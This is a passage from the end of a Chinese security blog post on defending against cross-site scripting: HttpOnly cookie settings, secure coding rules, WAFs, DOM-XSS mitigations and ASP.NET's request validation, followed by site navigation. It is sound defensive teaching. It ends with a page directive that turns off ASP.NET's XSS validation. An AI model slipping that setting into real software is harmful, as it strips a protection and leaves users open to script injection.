 <figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">（<span class="number">1</span>） 修改php<span class="selector-class">.ini</span>文件，设置其值为<span class="number">1</span>或TRUE；</span><br><span class="line">（<span class="number">2</span>） <span class="built_in">setcookie</span>()函数和<span class="built_in">setrawcookie</span>()函数的第七个参数</span><br><span class="line">（<span class="number">3</span>）在PHP代码中开启</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="7-Web安全编码规范"><a href="#7-Web安全编码规范" class="headerlink" title="7 Web安全编码规范"></a>7 Web安全编码规范</h4><ul>
<li><strong>对敏感字符转义、URL属性进行相应的规定等</strong></li>
</ul>
<h4 id="8-尽量使用WAF"><a href="#8-尽量使用WAF" class="headerlink" title="8 尽量使用WAF"></a>8 尽量使用WAF</h4><h4 id="9-防御DOM型XSS"><a href="#9-防御DOM型XSS" class="headerlink" title="9 防御DOM型XSS"></a>9 防御DOM型XSS</h4><ul>
<li>DOM型XSS主要是由客户端的脚本通过DOM动态地输出数据到页面而不是依赖于将数据提交给服务器端，而从客户端获得DOM中的数据在本地执行，因而仅从服务器端是无法防御的。</li>
<li>其防御在于：<ul>
<li>（1） 避免客户端文档重写、重定向或其他敏感操作，同时避免使用客户端数据，这些操作尽量在服务器端使用动态页面来实现；</li>
<li>（2） 分析和强化客户端JS代码，特别是受到用户影响的DOM对象，注意能直接修改DOM和创建HTML文件的相关函数或方法，并在输出变量到页面时先进行编码转义，如输出到HTML则进行HTML编码、输出到<script>则进行JS编码。</li>
</ul>
</li>
</ul>
<h4 id="10-ASP-NET中的XSS安全机制"><a href="#10-ASP-NET中的XSS安全机制" class="headerlink" title="10 ASP.NET中的XSS安全机制"></a>10 ASP.NET中的XSS安全机制</h4><ul>
<li><p>ASP.NET中有防范XSS的机制，对提交的表单会自动检查是否存在XSS，当用户试图输入XSS代码的时候，ASP.NET会抛出一个错误</p>
</li>
<li><p>很多程序员对安全没有概念， 甚至不知道有XSS的存在。 ASP.NET在这一点上做到默认安全。 这样的话就算是没有安全意识的程序员也能写出一个”较安全的网站“。</p>
</li>
<li><p>如果想禁止这个安全特性， 可以通过</p>
</li>
</ul>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@  Page  validateRequest=“false”  %&gt;</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/XSS/" rel="tag"># XSS</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/07/16/WEB%E5%AE%89%E5%85%A8%E2%80%94JSON%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/" rel="prev" title="WEB安全—JSON安全问题">
      <i class="fa fa-chevron-left"></i> WEB安全—JSON安全问题
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/07/20/WEB%E5%AE%89%E5%85%A8%E2%80%94XSS%E8%A7%A6%E5%8F%91%E3%80%81%E7%BB%95%E8%BF%87%E3%80%81%E7%9B%97%E5%8F%96Cookie/" rel="next" title="WEB安全—XSS触发、绕过、盗取Cookie">
      WEB安全—XSS触发、绕过、盗取Cookie <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-JavaScript%E7%9B%B8%E5%85%B3%E8%AF%AD%E6%B3%95"><span class="nav-number">1.</span> <span class="nav-text">0x01 JavaScript相关语法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%9F%BA%E7%A1%80%E8%AF%AD%E6%B3%95"><span class="nav-number">1.1.</span> <span class="nav-text">1 基础语法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-wiondow-open-%EF%BC%9A%E6%98%AFwindow%E5%AF%B9%E8%B1%A1%E4%B8%AD%E7%9A%84open-%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.</span> <span class="nav-text">2 wiondow.open()：是window对象中的open()方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-document-password-pass-value"><span class="nav-number">1.3.</span> <span class="nav-text">3 document.password.pass.value</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-javascript-alert"><span class="nav-number">1.4.</span> <span class="nav-text">4 javascript alert()</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-XSS%E5%AE%9A%E4%B9%89"><span class="nav-number">2.</span> <span class="nav-text">0x02 XSS定义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-XSS%E7%9A%84%E5%8E%9F%E7%90%86"><span class="nav-number">3.</span> <span class="nav-text">0x03  XSS的原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-XSS%E7%9A%84%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F"><span class="nav-number">4.</span> <span class="nav-text">0x04 XSS的攻击方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%8F%8D%E5%B0%84%E5%9E%8B"><span class="nav-number">4.1.</span> <span class="nav-text">1 反射型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF%E4%B8%80"><span class="nav-number">4.2.</span> <span class="nav-text">场景一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%AD%98%E5%82%A8%E5%9E%8B%EF%BC%88Stored-XSS%EF%BC%89"><span class="nav-number">4.3.</span> <span class="nav-text">2 存储型（Stored XSS）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF%E4%BA%8C"><span class="nav-number">4.4.</span> <span class="nav-text">场景二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-DOM%EF%BC%88Document-object-model%EF%BC%89%E5%9E%8BXSS"><span class="nav-number">4.5.</span> <span class="nav-text">3 DOM（Document object model）型XSS</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-XSS%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="nav-number">5.</span> <span class="nav-text">0x05 XSS漏洞测试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E6%96%B9%E6%B3%95%E4%B8%80"><span class="nav-number">5.1.</span> <span class="nav-text">1 方法一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="nav-number">5.2.</span> <span class="nav-text">2 方法二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E6%96%B9%E6%B3%95%E4%B8%89"><span class="nav-number">5.3.</span> <span class="nav-text">3 方法三</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F"><span class="nav-number">6.</span> <span class="nav-text">0x06 攻击方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%AE%B9%E6%98%93%E5%87%BA%E7%8E%B0XSS%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%9C%B0%E6%96%B9"><span class="nav-number">6.1.</span> <span class="nav-text">常见容易出现XSS漏洞的地方</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-%E6%95%B0%E6%8D%AE%E4%BA%A4%E4%BA%92%E7%9A%84%E5%9C%B0%E6%96%B9"><span class="nav-number">6.1.1.</span> <span class="nav-text">1.数据交互的地方</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-%E6%95%B0%E6%8D%AE%E8%BE%93%E5%87%BA%E7%9A%84%E5%9C%B0%E6%96%B9"><span class="nav-number">6.1.2.</span> <span class="nav-text">2.数据输出的地方</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%8F%8D%E5%B0%84%E6%80%A7XSS"><span class="nav-number">6.2.</span> <span class="nav-text">1 反射性XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="nav-number">6.3.</span> <span class="nav-text">2 存储型XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-DOM%E5%9E%8BXSS"><span class="nav-number">6.4.</span> <span class="nav-text">3 DOM型XSS</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x07-XSS%E5%AE%89%E5%85%A8%E6%80%A7%E5%88%86%E6%9E%90"><span class="nav-number">7.</span> <span class="nav-text">0x07 XSS安全性分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E9%A6%96%E5%85%88%E8%A6%81%E6%98%8E%E7%A1%AE%E7%9A%84%E6%98%AF%EF%BC%8C%E5%9C%A8%E5%8F%97%E5%AE%B3%E8%80%85%E7%9A%84%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E6%89%A7%E8%A1%8C%E8%84%9A%E6%9C%AC%E7%9A%84%E8%83%BD%E5%8A%9B%E7%AE%97%E4%B8%8D%E4%B8%8A%E7%89%B9%E5%88%AB%E6%81%B6%E6%84%8F"><span class="nav-number">7.0.1.</span> <span class="nav-text">（一）首先要明确的是，在受害者的浏览器中执行脚本的能力算不上特别恶意</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%EF%BC%88%E4%BA%8C%EF%BC%89%E8%BF%99%E7%A7%8D%E5%9C%A8%E5%85%B6%E4%BB%96%E7%94%A8%E6%88%B7%E7%9A%84%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E8%84%9A%E6%9C%AC%E7%9A%84%E6%9D%83%E9%99%90%EF%BC%8C%E8%B5%8B%E4%BA%88%E4%BA%86%E6%94%BB%E5%87%BB%E8%80%85%E6%9C%89%E8%83%BD%E5%8A%9B%E5%8F%91%E5%8A%A8%E4%BB%A5%E4%B8%8B%E5%87%A0%E7%B1%BB%E6%94%BB%E5%87%BB"><span class="nav-number">7.0.2.</span> <span class="nav-text">（二）这种在其他用户的浏览器中执行任意脚本的权限，赋予了攻击者有能力发动以下几类攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x08-XSS%E7%9A%84%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="nav-number">8.</span> <span class="nav-text">0x08 XSS的防御措施</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E8%B0%83%E7%94%A8%E5%87%BD%E6%95%B0"><span class="nav-number">8.1.</span> <span class="nav-text">1 调用函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E4%BD%BF%E7%94%A8XSS-Filter"><span class="nav-number">8.2.</span> <span class="nav-text">2 使用XSS Filter</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%EF%BC%881%EF%BC%89%E8%BE%93%E5%85%A5%E8%BF%87%E6%BB%A4"><span class="nav-number">8.2.1.</span> <span class="nav-text">（1）输入过滤</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%EF%BC%882%EF%BC%89-%E8%BE%93%E5%87%BA%E7%BC%96%E7%A0%81%EF%BC%88%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%EF%BC%89"><span class="nav-number">8.2.2.</span> <span class="nav-text">（2） 输出编码（服务器端）</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E7%99%BD%E5%90%8D%E5%8D%95%E5%92%8C%E9%BB%91%E5%90%8D%E5%8D%95%E7%BB%93%E5%90%88"><span class="nav-number">8.3.</span> <span class="nav-text">3 白名单和黑名单结合</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-Noscript"><span class="nav-number">8.4.</span> <span class="nav-text">4 Noscript</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-Anti-XSS"><span class="nav-number">8.5.</span> <span class="nav-text">5 Anti_XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-HttpOnly"><span class="nav-number">8.6.</span> <span class="nav-text">6 HttpOnly</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-Web%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E8%A7%84%E8%8C%83"><span class="nav-number">8.7.</span> <span class="nav-text">7 Web安全编码规范</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-%E5%B0%BD%E9%87%8F%E4%BD%BF%E7%94%A8WAF"><span class="nav-number">8.8.</span> <span class="nav-text">8 尽量使用WAF</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#9-%E9%98%B2%E5%BE%A1DOM%E5%9E%8BXSS"><span class="nav-number">8.9.</span> <span class="nav-text">9 防御DOM型XSS</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ashing"
      src="/images/dxx.jpg">
  <p class="site-author-name" itemprop="name">Ashing</p>
  <div class="site-description" itemprop="description">Cyber Security</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">36</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ashin9" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ashin9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ashin9@foxmail.com" title="E-Mail → mailto:ashin9@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://ttonys.github.io/" title="https:&#x2F;&#x2F;ttonys.github.io&#x2F;" rel="noopener" target="_blank">tongs</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://j0k3r.top/" title="http:&#x2F;&#x2F;j0k3r.top&#x2F;" rel="noopener" target="_blank">joker</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://daolgts.github.io/" title="https:&#x2F;&#x2F;daolgts.github.io" rel="noopener" target="_blank">daolgts</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://wzt.ac.cn/" title="https:&#x2F;&#x2F;wzt.ac.cn&#x2F;" rel="noopener" target="_blank">CataLpa</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://asa9ao.xyz/" title="http:&#x2F;&#x2F;asa9ao.xyz&#x2F;" rel="noopener" target="_blank">Asa9ao</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://v0w.top/" title="https:&#x2F;&#x2F;v0w.top" rel="noopener" target="_blank">vOw</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2018 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ashing</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
